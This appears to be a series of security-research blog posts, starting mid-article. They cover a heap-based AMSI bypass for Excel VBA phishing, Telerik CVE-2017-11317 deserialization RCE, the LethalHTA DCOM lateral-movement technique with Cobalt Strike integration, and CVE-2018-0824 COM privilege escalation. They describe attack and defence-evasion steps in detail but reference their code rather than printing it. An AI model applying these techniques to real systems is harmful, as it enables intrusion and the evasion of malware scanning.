So what we got here is a pointer to a struct called ‘HAMSICONTEXT__’. Let's have a look where this pointer points to by printing the memory address of ‘amsiContext’ in our client. This will allow us to inspect its contents using windbg:
The variable itself is located at address 0x16a144 (note we have 32-bit program here) and its content is 0x16c8b10, that's where it points to. At address 0x16c8b10 we see some memory starting with the ASCII characters ‘AMSI’ identifying a valid AMSI context. The output below the memory field is derived via ‘!address’ which prints the memory layout of the current process.
There we can see that the address 0x16c8b10 is allocated to a region starting from 0x16c0000 to 0x16df0000 which is identified as Heap. Okay, that means AmsiInitialize() delivers us a pointer to a struct residing on the heap. A deeper look into AmsiInitialize() using IDA delivers some evidence for that:
The function allocates 16 bytes (10h) using the COM-specific API CoTaskMemAlloc(). The latter is intended to be an abstraction layer for the heap. See here and here for details. After allocating the buffer the Magic Word 0x49534D41 is written to the beginning of the block, which is nothing more than our ‘AMSI’ in ASCII.
It is noteworthy to say that an application cannot easily change this behavior. The content of the AMSI context will always be stored on the heap unless really sneaky things are done, like copying the context to somewhere else or implementing your own memory provider. This explains why Microsoft states in their API documentation, that the application is responsible to call AmsiUnitialize() when it is done with AMSI. This is because the client cannot (should not) free that memory and the process of cleaning up is performed by the AMSI library.
Now we have understood that
the AMSI Context is an important data structure
it is always placed on the heap
it always starts with the ASCII characters ‘AMSI’
In case our AMSI context is corrupt, functions like AmsiScanBuffer() will fail with a return value different from zero. But what does corrupt mean, how does AmsiScanBuffer() detect if the context is valid? Let's check that in IDA:
The function does what we already spoilered in the beginning: The first four bytes of the AMSI Context are compared against the value ‘0x49534D41’. If the comparison fails, the function returns with 0x80070057 which does not equal 0 and tells something went wrong.
Bypassing AMSI in our own AMSI Client
Our heap-based approach assumes several things to finally depict a so called bypass:
we have already code execution in the context of the AMSI client, e.g. by executing a VBA script
The AMSI client (e.g. Excel) initializes the AMSI context only once and reuses this for every AMSI operation
the AMSI client rates the checked payload in case of a failure of AmsiScanBuffer() as ‘not malicious
The first point is not true for our test client but also not required because it depicts only a test vehicle which we can modify as desired.
Especially the last point is important because we will try to mess up the one and only AMSI context available in the target process. If the failure of AmsiScanBuffer() leads to negative side effects, in worst case the program might crash, the bypass will not work.
So our task is to iterate through the heap of the AMSI client process, look for chunks starting with ‘AMSI’ and mess this block up making all further AMSI operations fail.
Microsoft provides a nice code example which walks through the heap using a couple of functions from kernel32.dll.
Due to the fact that all the required information is present in user space one could do this task by parsing data structures in memory. Doing so would make the use of external functions obsolete but probably blow up our code so we decided to use the functions from the example above.
After cutting the example down to the minimum functionality we need, we end up with a function amsiByPass().
So this code retrieves the heap of the current process, iterates through it and looks at every chunk tagged as 'busy'. Within these busy chunks we check if the first bytes match our magic pattern ‘AMSI’ and if so overwrite it with some garbage.
The expectation is now that our payload is no longer flagged as malicious but the AmsiScanBuffer() function should return with a failure. Let's check that:
Okay, that's exactly what we expected. Are we done? No, not yet as we promised to provide an AMSI bypass for EXCEL/VBA so let's move on..
Bypassing AMSI in Excel using VBA
Now we will dive into the strange world of VBA. We used Microsoft Excel for Office 365 MSO (16.0.11727.20222) 32-bit for our testing.
After having written a basic POC in C we have to port this POC to VBA. VBA supports importing arbitrary external functions from DLLs so using our Heap APIs should be no problem. As far as we understood VBA, it does not allow pointer arithmetic or direct memory access. This problem can be resolved by importing a function which allows copying data from arbitrary memory locations into VBA variables. A very common function to perform this task is RtlMoveMemory().
After some code fiddling we came up with the following code.
As you can see we put some time measurement around the main loop. The number of rounds the loop may take can be several hundred thousand iterations and in addition with the poor VBA performance we expected a significant amount of time the bypass will take. Time is a crucial thing in a real attack scenario. If our phishing victim opens a malicious Excel sheet it is not acceptable that the embedded script blocks the execution for let's say more than one or two seconds. At least after 5 seconds of perceived unresponsiveness of the application a human will get impatient and do things like trying to close Excel, which is not what we want.
So let's see how long the bypass will take. To be honest, we did not expect what was happening. The result was difficult to reproduce but the measured runtime varied from 15 minutes to endless. In some rare cases Excel was closed after some minutes without any further notice. This was probably because it was unresponsive for too long. However, this isn't really something we can use in a real scenario.
Okay so what went wrong here? Is VBA really that slow? Yes, it is some orders of magnitude slower than our C code, but that does not explain what we experienced. Microsoft gives some internal details on how AMSI is implemented in Excel. It turns out that Excel uses another strategy as e.g. PowerShell does. The latter more or less sends the whole script to AmsiScanBuffer(). Excel implements a little smarter approach which is based on so called triggers. Microsoft considers pure VBA code to be harmless until the point when imports come into play. That's exactly what we do - importing functions from external DLLs. Some of these imports are treated as potentially dangerous and their call including all parameters are put into a ring buffer which is sent to AMSI. This gives AV solutions like MS defender the opportunity to check data behind addresses which of course makes sense. Let's see what data is sent to the AMSI API in our explicit case by breaking on AmsiScanBuffer using windbg:
As we can see the ring buffer contains all functions we imported including their parameter values. Our Windows 10 System has MS Defender installed and activated. So every call to AmsiScanBuffer() will bother our friend MS Defender. AMSI is implemented as In-process COM in the first place. But to finally communicate with other AV solutions it has to transport data out of process and perform a context switch. This can be seen on the next architecture overview provided by MS:
The little green block on the bottom of the figure shows that our process (Excel) indirectly communicates via rpc with Defender. Hmm... Okay so this is done several 100k times, which is just too much and explains the long runtime. To provide some more evidence we repeat the bypass with Defender switched off, which should significantly speed up our bypass. In addition to that we monitor the amount of calls to AmsiScanBuffer() so we can get an impression how often it is called.
The same loop with Defender disabled took something between one and two minutes:
In a separate run we check the amount of calls to AmsiScanBuffer() using windbg:
AmsiScanBuffer() is called 124624 times (0x10000000 - 0xffe1930) which is roughly the amount of iterations our loop did. That's a lot and underlines our assumptions that AMSI is just called very often. So we understood what is going on, but currently there seems no workaround available to solve our runtime problem.
Giving up now? Not yet...
Improving AMSI Bypass in Excel
As described in the chapter above our current approach is much too slow to be used in a real scenario. So what can we do to improve this situation?
One of the functions we imported is RtlMoveMemory() which is as mentioned earlier used by a lot of malware. Monitoring this function would make a lot of sense and it might be considered as trigger. Let's verify that by just removing the call to CopyMem (the alias for RtlMoveMemory) and see what happens. This prevents our bypass from working but it might give us some insight.
The runtime is now at 0.8 seconds. Wow okay, this really made a change. It shall be noted that in this configuration we even walk through the whole heap. Due to the missing call to RtlMoveMemory() we will not find our pattern.
After we identified our bottleneck, what can we do? We will have to find an alternative method to access raw memory which is not treated as trigger by Excel. Some random Googling revealed the following function: CryptBinaryToStringA() which is part of crypt32.dll. The latter should be present on most Windows systems and thus it should be okay to import it.
The function is intended to convert strings from one format to another but it can also be used to just simply copy bytes from an arbitrary memory position we specify. Cool, that's exactly what we are after! In order to abuse this function for our purpose we call it like that to read the lpData field from the Process Heap Entry structure:
The input parameter from left to right explained:
phe.lpData is the source we want to copy data from,
ByVal 4 is the length of bytes we want to copy (lpData is 32-bit on our 32-bit Excel)
ByVal 2 means we want to copy raw binary (CRYPT_STRING_BINARY)
ByVal VarPtr(magicWord) is the target we want to copy that memory to (our VBA variable magicWord)
the last parameter (ByVal VarPtr(bytesWritten)) tells us how many bytes were really copied
So let's replace all occurrences of RtlMoveMemory() with CryptBinaryToStringA() and check again how long our bypass takes. You can find an updated version of the source code right here.
Our loop now takes about four seconds to finish, that is still much but it finished and it told us that it found the pattern we are looking after. Let's see how many times Excel calls AmsiScanBuffer() now with this version:
Oh my... Excel did not call AmsiScanBuffer() at all. So this means as long as there is no trigger in our code, nothing is sent to AMSI. Or the other way around: As soon as we use one single trigger function, Excel will send all calls to AMSI. Good to know...
This is the first time we can really verify if the bypass works. So let's look for some code which triggers AMSI from VBA. Iliya Dafchev shows some port of an older AMSI Bypass to VBA which gets flagged by AMSI itself in the first place. Perfect, we will put this code into a function called triggerAMSI() and use it as positive test:
After running it Excel complains as expected with a warning and just closes our current instance of Excel:
AMSI Alert by Excel - sorry for the German!
Putting our bypass and our positive test together we get the following function:
Hopes are high, that the message box containing “we survived” gets displayed because we killed AMSI before triggering it.
Great, our bypass seems to work. So let's put this into our real phishing campaign. Uhm.. just wait, how long did the whole thing take? four seconds? Repeated execution of the bypass even showed runtimes greater than ten seconds. Oh no, this is still too much.
Giving up now? Not yet...
Improving AMSI Bypass in Excel - continued
In the last chapter we improved our AMSI bypass from infinite runtime to ten seconds or below. This seems to be still too much for a real campaign (our opinion). So what can we do to speed up the whole thing one more time?
The loop takes some 100k iterations which is done in C in no time. Defender is completely out of the game. So our current runtime seems to be a pure result of the bad VBA performance. To be fair, these kind of things we are currently trying to do are not a typical VBA task so let's blame us instead of Excel for doing crazy stuff...
Anyway, what can we do now? Programming C in VBA is not an option, but what about invoking some shellcode? As long as we can import arbitrary functions the execution of shellcode should not be a problem. This code snippet shows an example how to do that within VBA. The next step is converting our VBA code (or more our initial C code) into assembly language, that is, into shellcode.
Everyone who ever wrote some pieces of shellcode and wanted to call functions from DLLs knows that the absolute addresses of these functions are not known during the time the shellcode gets assembled. This means we have to implement a mechanism like GetProcAddress() to lookup the addresses of required functions during runtime. How to do this without any library support is well understood and extensively documented so we will not go into details here. Implementing this part of the shellcode is left as an excercise for the reader.
Of course there are many ready to use code snippets which should do the job, but we decided to implement the shellcode on our own. Why? Because it is fun and self written shellcode should be unlikely to get caught by AV solutions.
The main loop of our AMSI bypass in assembly can be found here.
The structure ShellCodeEnvironment holds some important information like the looked up address of our HeapWalk() and GetProcessHeaps() function. The rest of the loop should be straight forward...
So putting everything together we generate our shellcode, put it into our VBA code and start it from there as new thread. Of course we measure the runtime again:
This time it is only 0.02 seconds!
We think this result is more than acceptable. The runtime may vary depending on the processor load or the total heap size but it should be significantly below one second which was our initial goal.
Summary
We hope you enjoyed reading this blog post. We showed the feasibility of a heap-based AMSI bypass for VBA. The same approach, with slight adaptions, also works for PowerShell and .Net 4.8. The latter also comes with AMSI support integrated in its Common Language Runtime. As per Microsoft AMSI is not a security boundary so we do not expect that much reaction but are still curious if MS will develop some detection mechanisms for this idea.
In 2017, several vulnerabilities were discovered in Telerik UI, a popular UI component library for .NET web applications. Although details and working exploits are public, it often proves to be a good idea to take a closer look at it. Because sometimes it allows you to explore new avenues of exploitation.
Introduction
Telerik UI for ASP.NET is a popular UI component library for ASP.NET web applications. In 2017, several vulnerabilities were discovered, potentially resulting in remote code execution:
A cryptographic weakness allows the disclosure of the encryption key (Telerik.Web.UI.DialogParametersEncryptionKey and/or the MachineKey) used to protect the DialogParameters via an oracle attack. It can be exploited to forge a functional file manager dialog and upload arbitrary files and/or compromise the ASP.NET ViewState in case of the latter.
A hard-coded default key is used to encrypt/decrypt the AsyncUploadConfiguration, which holds the path where uploaded files are stored temporarily. It can be exploited to upload files to arbitrary locations.
The name of the file stored in the location specified in AsyncUploadConfiguration is taken from the request and thus allows the upload of files with arbitrary extension.
The vulnerabilities were fixed in R2 2017 SP1 (2017.2.621) and R2 2017 SP2 (2017.2.711), respectively. As for CVE-2017-9248, there is an analysis by PatchAdvisor[1] that gives some insights and exploitation hints. And regarding CVE-2017-11317, the detailed writeup by @straight_blast seems to have been published even half a year before Telerik published an updated version. It describes in detail how the vulnerability was discovered and how it can be exploited to upload an arbitrary file to an arbitrary location. If you're unfamiliar with these vulnerabilities, you may want to read the linked advisories first to get a better understanding.
The Catch
Although the vulnerabilities sound promising, they all have their catch: exploiting CVE-2017-9248 requires many thousands of requests, which can be pretty noticeable and suspicious. And unless it is actually possible to leak the MachineKey (which would allow an exploitation via deserialization of arbitrary ObjectStateFormatter stream), a file upload to an arbitrary location (i. e., CVE-2017-11317) is still limited to the knowledge of an appropriate location with sufficient write permissions.
The problem here is that by default the account that the IIS worker process w3wp.exe runs with is a special account like IIS AppPool\DefaultAppPool. And such an account usually does not have write permissions to the web document root directory like C:\inetpub\wwwroot or similar. Additionally, the web document root of the web application can also be somewhere else and may not be known. So simply writing an ASP.NET web shell probably won't work in many cases.
The Dead End
This was exactly the case when we faced Managed Workplace RMM by Avast Business in a red team assessment where we didn't want to make too much noise. Additionally, unauthenticated access to all *.aspx pages except for Login.aspx was denied, i. e., the handler Telerik.Web.UI.DialogHandler.aspx for exploiting CVE-2017-9248 was not reachable, and the other one, Telerik.Web.UI.SpellCheckHandler.axd, was not registered. So, CVE-2017-11317 seemed to be the only option left.
By enumerating known versions of Telerik Web UI, one request to upload to C:\Windows\Temp was finally successful. But an upload to C:\inetpub\wwwroot did not succeed. And since we did not have access to an installation of Managed Workplace, we had no insights into its directory structure. So this seemed to be a dead end.
The New Avenue
While tracing the path of the provided rauPostData through the Telerik code, there was one aspect that became apparent that was never mentioned before by anyone else: The exploitation of CVE-2017-11317 was always advertised as an arbitrary upload. This seems obvious as the handler's name is AsyncUploadHandler and rauPostData contains the upload configuration.
But after taking a closer look at the code that processes the rauPostData, it showed that the rauPostData is expected to consist of two parts separated by a &.
The first part is the JSON data (line 9). And the second part is the assembly qualified type name (line 10) that the JSON data should be deserialize to. The call in line 11 then ends up in SerializationService.Deserialize(string, Type).
Here a JavaScriptSerializer gets parameterized with the type provided in the rauPostData. That means this is an arbitrary JavaScriptSerializer deserialization!
From the research Friday the 13th JSON Attacks by Alvaro Muñoz & Oleksandr Mirosh it is known that arbitrary JavaScriptSerializer deserialization can be harmful if the expected type can be specified by the attacker. During deserialization, appropriate setter methods get called. A suitable gadget is the System.Configuration.Install.AssemblyInstaller, which allows the loading of a DLL by specifying its path. If the DLL is a mixed mode assembly, its DllMain() entry point gets called on load, which allows the execution of arbitrary code in the context of the w3wp.exe process.
This allowed the remote code execution on Managed Workplace without authentication. The issue has been addressed and should be fixed in Managed Workplace 11 SP4 MR2.
Conclusion
So CVE-2017-11317 can be exploited even without the requirement of being able to write to the web document root:
Upload a mixed mode assembly DLL to a writable location using the regular AsyncUploadConfiguration exploit.
Load the uploaded DLL and thereby trigger its DllMain() function using the AssemblyInstaller exploit described above.
This is an excellent example that revisiting old vulnerabilities can be worthwhile and result in new ways out of a supposed dead end.
[1] The original blog post was deleted. But, you know, the Internet never forgets. ;)
The following blog post introduces a new lateral movement technique that combines the power of DCOM and HTA. The research
on this technique is partly an outcome of our recent research efforts on COM Marshalling:
Marshalling to SYSTEM - An analysis of CVE-2018-0824.
Previous Work
Several lateral movement techniques using DCOM were discovered in the past by
Matt Nelson,
Ryan Hanson,
Philip Tsukerman and
@bohops. A good overview of all the known techniques can be found in the
blog post by Philip Tsukerman. Most of the existing techniques execute commands via
ShellExecute(Ex). Some COM objects provided by Microsoft Office allow you to execute script code (e.g VBScript) which
makes detection and forensics even harder.
LethalHTA
LethalHTA is based on a very well-known COM object that was used in all the Office Moniker attacks in the past (see
FireEye's blog post):
ProgID: "htafile"
CLSID : "{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}"
AppID : "{40AEEAB6-8FDA-41E3-9A5F-8350D4CFCA91}"
Using James Forshaw's
OleViewDotNet we get some details on the COM object. The COM object runs as local server.
It has an App ID and default
launch and
access permissions. Only COM objects having an App ID can be used for lateral movement.
It also implements various interfaces as we can see from OleViewDotNet.
One of the interfaces is
IPersistMoniker. This interface is used to save/restore a COM object's state to/from an
IMoniker instance.
Our initial plan was to create the COM object and restore its state by calling the
IPersistMoniker->Load() method with a
URLMoniker pointing to an HTA file. So we created a small program and run it in VisualStudio.
But calling
IPersistMoniker->Load() returned an error code
0x80070057. After some debugging we realized that the error code came from a call to
CUrlMon::GetMarshalSizeMax(). That method is called during custom marshalling of a URLMoniker. This makes perfect
sense since we called
IPersistMoniker->Load() with a URLMoniker as a parameter. Since we do a method call on a remote COM object the parameters
need to get (custom) marshalled and sent over RPC to the RPC endpoint of the COM server.
So looking at the implementation of
CUrlMon::GetMarshalSizeMax() in IDA Pro we can see a call to
CUrlMon::ValidateMarshalParams() at the very beginning.
At the very end of this function we can find the error code set as return value of the function. Microsoft is validating
the
dwDestContext parameter. If the parameter is
MSHCTX_DIFFERENTMACHINE (0x2) then we eventually reach the error code.
As we can see from the references to
CUrlMon::ValidateMarshalParams() the method is called from several functions during marshalling.
In order to bypass the validation we can take the same approach as described in our last
blog post: Creating a fake object. The fake object needs to implement
IMarshal and
IMoniker. It forwards all calls to the
URLMoniker instance. To bypass the validation the implementation methods for
CUrlMon::GetMarshalSizeMax,
CUrlMon::GetUnmarshalClass,
CUrlMon::MarshalInterface
need to modify the
dwDestContext parameter to MSHCTX_NOSHAREDMEM(0x1). The implementation for
CUrlMon::GetMarshalSizeMax() is shown in the following code snippet.
And that's all we need to bypass the validation. Of course we could also patch the code in
urlmon.dll. But that would require us to call
VirtualProtect() to make the page writable and modify
CUrlMon::ValidateMarshalParams() to always return zero. Calling
VirtualProtect() might get caught by EDR or "advanced" AV products so we wouldn't recommend it.
Now we are able to call the
IPersistMoniker->Load() on the remote COM object. The COM object implemented in
mshta.exe will load the HTA file from the URL and evaluate its content. As you already know the HTA file can contain
script code such as JScript or VBScript. You can even combine our technique with James Forshaw's
DotNetToJScript to run your payload directly from memory!
It should be noted that the file doesn't necessarily need to have the
hta file extension. Extensions such as
html,
txt,
rtf work fine as well as no extension at all.
LethalHTA and LethalHTADotNet
We created implementations of our technique in
C++ and
C#. You can run them as standalone programms. The C++ version is more a proof-of-concept and might help you creating
a reflective DLL from it. The C# version can also be loaded as an Assembly with
Assembly.Load(Byte[]) which makes it easy to use it in a Powershell script. You can find both implementations under
releases on our
GitHub.
CobaltStrike Integration
To be able to easily use this technique in our day-to-day work we created a Cobalt Strike Aggressor Script called
LethalHTA.cna that integrates the .NET implementation (LethalHTADotNet) into Cobalt Strike by providing two distinct
methods for lateral movement that are integrated into the GUI, named
HTA PowerShell Delivery (staged - x86)
and
HTA .NET In-Memory Delivery (stageless - x86/x64 dynamic)
The
HTA PowerShell Delivery method allows to execute a PowerShell based, staged beacon on the target system. Since the
PowerShell beacon is staged, the target systems need to be able to reach the HTTP(S) host and TeamServer (which are in
most cases on the same system).
The
HTA .NET In-Memory Delivery takes the technique a step further by implementing a memory-only solution that provides
far more flexibility in terms of payload delivery and stealth. Using the this option it is possible to tunnel the HTA
delivery/retrieval process through the beacon and also to specify a proxy server. If the target system is not able to
reach the TeamServer or any other Internet-connected system, an
SMB listener can be used instead. This allows to reach systems deep inside the network by bootstrapping an SMB beacon
on the target and connecting to it via named pipe from one of the internal beacons.
Due to the techniques used, everything is done within the
mshta.exe process without creating additional processes.
The combination of two techniques, in addition to the HTA attack vector described above, is used to execute everything in-memory.
Utilizing
DotNetToJScript, we are able to load a small .NET class (SCLoader) that dynamically determines the processes architecture (x86 or x64) and then executes the included stageless
beacon shellcode. This technique can also be re-used in other scenarios where
it is not apparent which architecture is used before exploitation.
For a detailed explanation of the steps involved visit our
GitHub Project.
Detection
To detect our technique you can watch for files inside the INetCache (%windir%\[System32 or SysWOW64]\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\) folder containing
"ActiveXObject". This is due to
mshta.exe caching the payload file. Furthermore it can be detected by an
mshta.exe process spawned by
svchost.exe.
In May 2018 Microsoft patched an interesting vulnerability (CVE-2018-0824) which was reported by Nicolas Joly of Microsoft's MSRC:
A remote code execution vulnerability exists in "Microsoft COM for Windows" when it fails to properly handle serialized objects.
An attacker who successfully exploited the vulnerability could use a specially crafted file or script to perform actions. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. In a web-based attack scenario, an attacker could host a website (or leverage a compromised website that accepts or hosts user-provided content) that contains a specially crafted file that is designed to exploit the vulnerability. However, an attacker would have no way to force the user to visit the website. Instead, an attacker would have to convince the user to click a link, typically by way of an enticement in an email or Instant Messenger message, and then convince the user to open the specially crafted file.
The security update addresses the vulnerability by correcting how "Microsoft COM for Windows" handles serialized objects.
The keywords "COM" and "serialized" pretty much jumped into my face when the advisory came out.
Since I had already spent several months of research time on Microsoft COM last year I decided to look into it. Although the vulnerability can result in remote code execution, I'm only interested in the privilege escalation aspects.
Before I go into details I want to give you a quick introduction into COM and how deserialization/marshalling works.
As I'm far from being an expert on COM, all this information is either based on the great book "Essential COM" by Don Box or the awesome Infiltrate '17 Talk "COM in 60 seconds".
I have skipped several details (IDL/MIDL, Apartments, Standard Marshalling, etc.) just to keep the introduction short.
Introduction to COM and Marshalling
COM (Component Object Model) is a Windows middleware having reusable code (=component) as a primary goal.
In order to develop reusable C++ code, Microsoft engineers designed COM in an object-oriented manner having the following key aspects in mind:
Portability
Encapsulation
Polymorphism
Separation of interfaces from implementation
Object extensibility
Resource Management
Language independence
COM objects are defined by an interface and implementation class.
Both interface and implementation class are identified by a GUID.
A COM object can implement several interfaces using inheritance.
All COM objects implement the IUnknown interface which looks like the following class definition in C++:
The QueryInterface() method is used to cast a COM object to a different interface implemented by the COM object.
The AddRef() and Release() methods are used for reference counting.
Just to keep it short I rather go on with an existing COM object instead of creating an artificial example COM object.
A Control Panel COM object is identified by the GUID {06622D85-6856-4460-8DE1-A81921B41C4B}. To find out more about the COM object we could analyze the registry manually or just use the great tool "OleView .NET".
The "Control Panel" COM object implements several interfaces as we can see in the screenshot of OleView .NET:
The implementation class of the COM object (COpenControlPanel) can be found in shell32.dll.
To open a "Control Panel" programmatically we make use of the COM API:
In line 6 we initialize the COM environment
In line 7 we create an instance of a "Control Panel" object
In line 8 we cast the instance to the IOpenControlPanel interface
In line 9 we open the "Control Panel" by calling the "Open" method
Inspecting the COM object in the debugger after running until line 9 shows us the virtual function table (vTable) of the object:
The function pointers in the vTable of the object point to the actual implementation functions in shell32.dll.
The reason for that is that the COM object was created as a so called InProc server which means that shell32.dll
got loaded into the current process address space. When passing CLSCTX_ALL, CoCreateInstance() tries to create an InProc server first.
If it fails, other activation methods are tried (see CLSCTX enumeration).
By changing the CLSCTX_ALL parameter to function CoCreateInstance() to CLSCTX_LOCAL_SERVER and running the program again we can notice some differences:
The vTable of the object contains now function pointers from the OneCoreUAPCommonProxyStub.dll.
And the 4th function pointer which corresponds to the Open()" method now points to OneCoreUAPCommonProxyStub!ObjectStublessClient3().
The reason for that is that we created the COM object as an out-of-process server.
The following diagram tries to give you an architectural overview (shamelessly borrowed from Project Zero):
The function pointers in the COM object point to functions of the proxy class.
When we execute the IOpenControlPanel::Open()" method, the method OneCoreUAPCommonProxyStub!ObjectStublessClient3() gets called on the proxy.
The proxy class itself eventually calls RPC methods (e.g. RPCRT4!NdrpClientCall3) to send the parameters to the RPC server in the out-of-process server.
The parameters need to get serialized/marshalled to send them over RPC.
In the out-of-process-server the parameters get deserialized/unmarshalled and the Stub invokes shell32!COpenControlPanel::Open().
For non-complex parameters like strings the serialization/marshalling is trivial as these are sent by value.
How about complex parameters like COM objects?
As we can see from the method definition of IOpenControlPanel::Open() the third parameter is a pointer to an IUnknown COM object:
The answer is that a complex object can either get marshalled by reference (standard marshalling) or the serialization/marshalling logic can be customized by implementing the IMarshal interface (custom marshalling).
The IMarshal interface has a few methods as we can see in the following definition:
During serialization/marshalling of a COM object the IMarshal::GetUnmarshalClass() method gets called by the COM which returns the GUID of the class to be used for unmarshalling.
Then the method IMarshal::GetMarshalSizeMax() is called to prepare a buffer for marshalling data.
Finally the IMarshal::MarshalInterface() method is called which writes the custom marshalling data to the IStream object.
The COM runtime sends the GUID of the "Unmarshal class" and the IStream object via RPC to the server.
On the server the COM runtime creates the "Unmarshal class" using the CoCreateInstance() function, casts it to the IMarshal interface using QueryInterface and eventually invokes the
IMarshsal::UnmarshalInterface() method on the "Unmarshal class" instance, passing the IStream as a parameter.
And that's also where all the misery starts ...
Diffing the patch
After downloading the patch for Windows 8.1 x64 and extracting the files, I found two patched DLLs related to Microsoft COM:
oleaut32.dll
comsvcs.dll
Using Hexray's IDA Pro and Joxean Koret's Diaphora I analyzed the changes made by Microsoft.
In oleaut32.dll several functions were changed but nothing special related to deserialisation/marshalling:
In comsvcs.dll only four functions were changed:
Clearly, one method stood out: CMarshalInterceptor::UnmarshalInterface().
The method CMarshalInterceptor::UnmarshalInterface() is the implementation of the UnmarshalInterface() method of the IMarshal interface.
As we already know from the introduction this method gets called during unmarshalling.
The bug
Further analysis was done on Windows 10 Redstone 4 (1803) including March patches (ISO from MSDN).
In the very beginning of the method CMarshalInterceptor::UnmarshalInterface() 20 bytes are read from the IStream object into a buffer on the stack.
Later the bytes in the buffer are compared against the GUID of the CMarshalInterceptor class (ECABAFCB-7F19-11D2-978E-0000F8757E2A).
If the bytes in the stream match we reach the function CMarshalInterceptor::CreateRecorder().
In function CMarshalInterceptor::CreateRecorder() the COM-API function ReadClassStm is called.
This function reads a CLSID(GUID) from the IStream and stores it into a buffer on the stack. Then the CLSID gets compared against the GUID of a CompositeMoniker.
As you may have already followed the different Moniker "vulnerabilities" in 2016/17 (URLMoniker, ScriptMoniker, SOAPMoniker), Monikers are definitely something you want to find in code which you might be able to trigger.
The IMoniker interface inherits from IPersistStream which allows a COM object implementing it to load/save itself from/to an IStream object. Monikers identify objects uniquely and can locate, activate and get a reference to the object by calling the BindToObject() method of the IMoniker instance.
If the CLSID doesn't match the GUID of the CompositeMoniker we follow the path to the right.
Here, the COM-API functionCoCreateInstance() is called with the CLSID read from the IStream as the first parameter. If COM finds the specific class and is able to cast it to an IMoniker interface we reach the next basic block. Next, the IPersistStream::Load() method is called on the newly created instance which restores the saved Moniker state from the IStream object.
And finally we reach the call to BindToObject() which triggers all evil ...
Exploiting the bug
For exploitation I'm following the same approach as described in the bug tracker issue "DCOM DCE/RPC Local NTLM Reflection Elevation of Privilege" by Project Zero.
I'm creating a fake COM Object class which implements the IStorage and IMarshal interfaces.
All implementation methods for the IStorage interface will be forwarded to a real IStorage instance as we will see later.
Since we are implementing custom marshalling, the COM runtime wants to know which class will be used to deserialize/unmarshal our fake object.
Therefore the COM runtime calls IMarshal::GetUnmarshalClass(). To trigger the Moniker, we just need to return the GUID of the "QC Marshal Interceptor Class" class (ECABAFCB-7F19-11D2-978E-0000F8757E2A).
The final step is to implement the IMarshal::MarshalInterface() method. As you already know the method gets called by the COM runtime to marshal an object into an IStream.
To trigger the call to IMoniker::BindToObject(), we only need to write the required bytes to the IStream object to satisfy all conditions in CMarshalInterceptor::UnmarshalInterface().
I tried to create a Script Moniker COM object with CLSID {06290BD3-48AA-11D2-8432-006008C3FBFC} using CoCreateInstance(). But hey, I got a "REGDB_E_CLASSNOTREG" error code. Looks like Microsoft introduced some changes.
Apparently, the Script Moniker wouldn't work anymore. So I thought of exploiting the bug using the "URLMoniker/hta file".
But luckily I remembered that in the method CMarshalInterceptor::CreateRecorder() we had a check for a CompositeMoniker CLSID.
So following the left path, we have a basic block in which 4 bytes are read from the stream into the stack buffer (var_78). Next we have a call to CMarshalInterceptor::LoadAndCompose() with the IStream, a pointer to an IMoniker interface pointer and the value from the stack buffer as parameters.
.
In this method an IMoniker instance is read and created from the IStream using the OleLoadFromStream() COM-API function. Later in the method, CMarshalInterceptor::LoadAndCompose() is called recursively to compose a CompositeMoniker. By invoking IMoniker::ComposeWith() a new IMoniker is created being a composition of two monikers. The pointer to the new CompositeMoniker will be stored in the pointer which was passed to the current function as parameter. As we have seen in one of the previous screenshots the BindToObject() method will be called on the CompositeMoniker later on.
As I remembered from Haifei Li's blog post there was a way to create a Script Moniker by composing a File Moniker and a New Moniker.
Armed with that knowledge I implemented the final part of the IMarshal::MarshalInterface() method.
I placed a SCT file in "c:\temp\poc.sct" which runs notepad from an ActiveXObject.
Then I tried BITS as a target server first which didn't work.
Using OleView .NET I found out that BITS doesn't support custom marshalling (see EOAC_NO_CUSTOM_MARSHAL).
But the SearchIndexer service with CLSID {06622d85-6856-4460-8de1-a81921b41c4b} was running as SYSTEM and allowed custom marshalling.
So I created a PoC which has the following main() function.
The call to CoGetInstanceFromIStorage() will activate the target COM server and trigger the serialization of the FakeObject instance.
Since the COM-API function requires an IStorage as a parameter, we had to implement the IStorage interface in our FakeObject class.
After running the POC we finally have a "notepad.exe" running as SYSTEM.
Microsoft is now checking a flag read from the Thread-local storage. The flag is set in a different method not related to marshalling. If the flag isn't set, the function CMarshalInterceptor::UnmarshalInterface() will exit early without reading anything from the IStream.
Takeaways
Serialization/Unmarshalling without validating the input is bad. That's for sure.
Although this blog post only covers the privilege escalation aspect, the vulnerability can also be triggered from Microsoft Office or by an Active X running in the browser. But I will leave this as an exercise to the reader :-)
RichFaces is one of the most popular component libraries for JavaServer Faces (JSF). In the past, two vulnerabilities (CVE-2013-2165 and CVE-2015-0279) have been found that allow RCE in versions 3.x ≤ 3.3.3 and 4.x ≤ 4.5.3. Code White discovered two new vulnerabilities which bypass the implemented mitigations. Thereby, all RichFaces versions including the latest 3.3.4 and 4.5.17 are vulnerable to RCE.
Introduction
JavaServer Faces (JSF) is a framework for building user interfaces for web applications. While there are only two major JSF implementations (i. e., Apache MyFaces and Oracle Mojarra), there are several component libraries, which provide additional UI components and features. RichFaces is one of the most popular libraries among these component libraries and since it became part of JBoss (and thereby also part of Red Hat), it is also part of several JBoss/Red Hat products, for example JBoss EAP and JBoss Portal.[1]
In the past, two significant vulnerabilities have been discovered by Takeshi Terada of MBSD, which both affect various RichFaces versions:
CVE-2013-2165: Arbitrary Java Deserialization in RichFaces 3.x ≤ 3.3.3 and 4.x ≤ 4.3.2
Deserialization of arbitrary Java serialized object streams in org.ajax4jsf.resource.ResourceBuilderImpl allows remote code execution.
CVE-2015-0279: Arbitrary EL Evaluation in RichFaces 4.x ≤ 4.5.3 (RF-13977)
Injection of arbitrary EL method expressions in org.richfaces.resource.MediaOutputResource allows remote code execution.
Both vulnerabilities rely on the feature to generate images, video, sounds, and other resources on the fly based on data provided in the request. The provided data is either interpreted as a plain array of bytes or as a Java serialized object stream. In RichFaces 3.x, the data gets appended to the URL path preceded by either /DATB/ (byte array) or /DATA/ (Java serialized object stream); in RichFaces 4.x, the data is transmitted in a request parameter named db (byte array) or do (Java serialized object stream). In all cases, the binary data is compressed using DEFLATE and then encoded using a URL-safe Base64 encoding.
CVE-2013-2165: Arbitrary Java Deserialization
